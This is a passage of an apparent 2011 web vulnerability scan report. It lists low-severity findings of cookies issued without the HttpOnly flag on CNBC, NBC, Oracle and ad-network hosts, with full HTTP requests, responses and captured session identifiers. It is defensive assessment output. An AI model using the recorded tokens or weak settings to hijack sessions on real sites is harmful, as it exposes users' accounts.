The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/wl.asp?nCTID=0&nSCID=0&nIID=30314234&nICnt=1&nDCnt=10&nRGID=1964&sPCode=&nStoreID=0&nVStoreID=0&sModelNumber=047400098961&sCCode=US&nRadius=15&nColID=0&nOppCnt=0&sRL=841291_24552604_11302_48968727_13017277_2271669_64856419_13016956_48968727_26080384_8679155&nRID=0&sRnd=B96Gjac1 HTTP/1.1
Host: pg.links.origin.channelintelligence.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=00047400302457
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Date: Tue, 06 Sep 2011 16:45:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
pragma: no-cache
Location: http://ttwbs.channelintelligence.com/?eid=203&oid=19483251&linkid=&uid=30314234&rgid=1964&scid=0&ctid=0&crdr=http%3A%2F%2Fcontent%2Elinks%2Echannelintelligence%2Ecom%2Fimages%2Fblank%2Egif%3Fy%3D0&origargs=nCTID%3D0%26nSCID%3D0%26nIID%3D30314234%26nICnt%3D1%26nDCnt%3D10%26nRGID%3D1964%26sPCode%3D%26nStoreID%3D0%26nVStoreID%3D0%26sModelNumber%3D047400098961%26sCCode%3DUS%26nRadius%3D15%26nColID%3D0%26nOppCnt%3D0%26sRL%3D841291%5F24552604%5F11302%5F48968727%5F13017277%5F2271669%5F64856419%5F13016956%5F48968727%5F26080384%5F8679155%26nRID%3D0%26sRnd%3DB96Gjac1
Content-Length: 716
Content-Type: image/gif
Expires: Tue, 06 Sep 2011 16:44:36 GMT
Set-Cookie: sessionstamp=21967169; expires=Tue, 06-Sep-2011 17:45:36 GMT; domain=.channelintelligence.com; path=/
Set-Cookie: serverstamp=8C99A705%2DDFFB%2D4466%2D920B%2DD463DD386426; expires=Mon, 18-Jan-2038 05:00:00 GMT; domain=.channelintelligence.com; path=/
Set-Cookie: ASPSESSIONIDQSSATADQ=MHDNEIADOCGBNAAMMCKHGJDD; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://ttwbs.channelintelligence.com/?eid=203&amp;oid=19483251&amp;linkid=&amp;uid=30314234&amp;rg
...[SNIP]...

13.16. http://pixel.adsafeprotected.com/jspix

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jspix?anId=144&pubId=4749&campId=176996 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7C0A9FBD613B362C337EB77B71CF9834; Path=/
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:05:41 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250",
   adsafeSrc : "",

...[SNIP]...

13.17. http://pixel.everesttech.net/1688/i

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pixel.everesttech.net
Path:   /1688/i

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1688/i?ev_sid=58&ev_ci=700032768&ev_ai=700644175&ev_cri=705923885&ev_pl HTTP/1.1
Host: pixel.everesttech.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gglck=zqROZUBXyFQAAIdR; everest_g_v2=g_surferid~zqROZUBXyFQAAIdR

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:08:44 GMT
Server: Apache
Set-Cookie: everest_session_v2=ts5OZjd7UQcAAI3@; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; path=/; domain=.everesttech.net; expires=Wed, 11-Sep-2030 01:48:44 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Vary: X-EF-Forwarded-For,Cookie,Host
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "2051142-80-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 128
Content-Type: image/png

.PNG
.
...IHDR.....................bKGD.............    pHYs...........~.....tIME......).......IDATx.c````........E@....IEND.B`.

13.18. https://register.cnbc.com/forgotPassword.do

Summary

Severity:   Low
Confidence:   Firm
Host:   https://register.cnbc.com
Path:   /forgotPassword.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forgotPassword.do HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; JSESSIONID=7FFDB885E3232AE9759F6D0A6D01E627; s_cc=true; s_nr=1315339307081; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSign-in%25257CDefault%25257CSite%252520Sign-in%252520Page%2526pidt%253D1%2526oid%253Dhttp%25253A//register.cnbc.com/forgotpassword1.jsp%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:49 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Set-Cookie: JSESSIONID=3903DB621D7BD6523413306545DD8633; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:49 GMT; path=/
Content-Length: 85618


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
   <title>Reset Password</title>
<link href="/css/member_center_sytles.css" rel="stylesheet" typ
...[SNIP]...

13.19. https://register.cnbc.com/memberCenter.do

Summary

Severity:   Low
Confidence:   Firm
Host:   https://register.cnbc.com
Path:   /memberCenter.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /memberCenter.do HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:01:29 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Set-Cookie: JSESSIONID=EB56D589D26668AFFB39D13706936E94; Path=/
Location: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register
Content-Length: 0
Connection: close
Content-Type: text/plain
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:01:29 GMT; path=/


13.20. https://register.cnbc.com/registerUser.do

Summary

Severity:   Low
Confidence:   Firm
Host:   https://register.cnbc.com
Path:   /registerUser.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /registerUser.do?iframe=yes&source=register HTTP/1.1
Host: register.cnbc.com
Connection: keep-alive
Referer: https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D; JSESSIONID=EB56D589D26668AFFB39D13706936E94

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:43 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Set-Cookie: JSESSIONID=0B252CD2AC1891E8F5AE500FFDA5AC28; Path=/
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:43 GMT; path=/
Content-Length: 53350


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Ty
...[SNIP]...

13.21. http://search.oracle.com/search/search

Summary

Severity:   Low
Confidence:   Firm
Host:   http://search.oracle.com
Path:   /search/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/search?start=1&search_p_main_operator=all&group=Oracle+OpenWorld&q=xss+faq+help+contact+phone HTTP/1.1
Host: search.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/register/packages/index.html?src=7013425&Act=226
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_nr=1315342463159; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Fregister%2Fpackages%2Findex.html%3Fsrc%3D7013425%26Act%3D226; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=0
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.2 (TN;ecid=118531604039,0)
Content-Length: 38704
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:54:24 GMT
Connection: close
Set-Cookie: JSESSIONID=8d920c7f1e6c29f780b369434c7e86c0802cf02ce47e; path=/search
Set-Cookie: ses.qapp.sg_tab_name=Oracle+OpenWorld; HttpOnly
Set-Cookie: BIGipServerses_ext_prod_pool=2131530381.30494.0000; expires=Wed, 07-Sep-2011 03:54:24 GMT; path=/



...[SNIP]...

13.22. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

Summary

Severity:   Low
Confidence:   Firm
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallback HTTP/1.1
Host: snas.nbcuni.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: s_nr=1313446468300; s_vi=[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:28 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=96CD1AEC186AFFCEEE1A9069E6B37A5F; Path=/
Cache-Control: max-age=10
Expires: Tue, 06 Sep 2011 15:00:38 GMT
Content-Length: 167
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"s_nr":"1313446468300","JSESSIONID":"96CD1AEC186AFFCEEE1A9069E6B37A5F","s_vi":"[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]"}});

13.23. http://ttwbs.channelintelligence.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ttwbs.channelintelligence.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?eid=203&oid=19483251&linkid=&uid=163810295&rgid=1964&scid=0&ctid=0&crdr=http%3A%2F%2Fcontent%2Elinks%2Echannelintelligence%2Ecom%2Fimages%2Fblank%2Egif%3Fy%3D0&origargs=nCTID%3D0%26nSCID%3D0%26nIID%3D163810295%26nICnt%3D1%26nDCnt%3D8%26nRGID%3D1964%26sPCode%3D%26nStoreID%3D0%26nVStoreID%3D0%26sModelNumber%3D047400098978%26sCCode%3DUS%26nRadius%3D15%26nColID%3D0%26nOppCnt%3D0%26sRL%3D13017277%5F841291%5F8679155%5F13016956%5F48968727%5F11302%5F86109971%5F26080384%26nRID%3D0%26sRnd%3DB96GjZc1 HTTP/1.1
Host: ttwbs.channelintelligence.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=047400098978
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: serverstamp=951ED21A%2D5742%2D4191%2DBC56%2D8856DB199D2C

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 16:45:37 GMT
Server: Jetty(6.1.22)
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: sessionstamp=5F0620DE-F4C8-E4AD-F1CC-A22673796C99;Domain=.channelintelligence.com;Expires=Tue, 06-Sep-11 17:45:37 GMT
Cache-Control: private
Content-Length: 0
Location: http://content.links.channelintelligence.com/images/blank.gif?y=0
Via: 1.1 iad061102000000 (MII-APC/2.1)
Content-Type: text/plain


13.24. http://www.atg.com/svc-common/script/propertyFunc.js.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.atg.com
Path:   /svc-common/script/propertyFunc.js.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /svc-common/script/propertyFunc.js.jsp HTTP/1.1
Host: www.atg.com
Proxy-Connection: keep-alive
Referer: http://www.atg.com/service/main.jsp?t=searchTab&dosearch=true&SearchButton=Find&searchstring=xss+faq+help&search=GO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ==
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Expires: Tue, 06 Sep 2011 15:35:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:35:19 GMT
Content-Length: 5890
Connection: close
Set-Cookie: JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22; Path=/

//*************************************************************************
//
// propertyfunc.js.jsp File
//
// (C) Copyright 1997-2009 ATG, Inc.
// All rights reserved.
//
// This page defines the p
...[SNIP]...

13.25. http://a.tribalfusion.com/displayAd.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /displayAd.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /displayAd.js?dver=0.4&th=37103964303 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 153
X-Reuse-Index: 1
Date: Tue, 06 Sep 2011 14:59:02 GMT
Last-Modified: Sat, 20 Aug 2011 07:25:15 GMT
Expires: Mon, 05 Dec 2011 14:59:02 GMT
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:02 GMT;
Cache-Control: private
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 247
Connection: keep-alive

var e9Manager;
var e9;

if (e9 !== undefined)
{
if (e9.displayAdFlag !== undefined)
{
if (e9.displayAdFlag === true)
    e9.displayAd();
}
else
e9Manager.displayAdFromE9(e9)
...[SNIP]...

13.26. http://a.tribalfusion.com/i.cid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /i.cid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i.cid?c=271753&d=30&page=landingPage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1917245;type=cscro065;cat=cscho154;ord=4762175416108.221?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 206
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 15:57:45 GMT;
Content-Type: text/html
Location: /z/i.cid?c=271753&d=30&page=landingPage
Content-Length: 36
Connection: keep-alive

<h1>Error 302 Moved Temporarily</h1>

13.27. http://a.tribalfusion.com/j.ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=cnbc&adSpace=ros&tagKey=117090495&th=37103964303&tKey=undefined&size=300x250&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss%26categories%3Dexclude&f=1&p=19075868&a=1&rnd=19083097 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:04 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 267
Expires: 0
Connection: keep-alive

document.write('<iframe src="http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250" width=300 height=250 marginwidth=0 marginh
...[SNIP]...

13.28. http://a.tribalfusion.com/p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p.media/aamOnI1cUV0GrpmEn23rFUVFFCVPY0REfYQGBsStZbwYHfrVmbO3GvVXbnAVmuu2AU8P6MD4HFr0HQAntIx3P3R5cvbUGJlVVMjPPnyWd33UrFS2r2rUanvVEQ7STYJScfJPFunRtjdVGMP5buxmtetYayx2t3EPGfA2mJyfvX8cG/2020316/frame.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 14:59:05 GMT;
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 191
Expires: 0
Connection: keep-alive

<script type="text/javascript" language="JavaScript">
var img = new Image();
img.src = "http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-tribalfusion&cg=&cc=1&rnd=1228001246";
</script>

13.29. http://a.tribalfusion.com/z/i.cid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /z/i.cid

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /z/i.cid?c=271753&d=30&page=landingPage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1917245;type=cscro065;cat=cscho154;ord=4762175416108.221?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 307
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Fri, 03-Sep-2021 15:57:46 GMT;
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,........@..D..;

13.30. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1163.iframe.120x60/**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1163.iframe.120x60/**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/1655.1163.iframe.120x60/** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

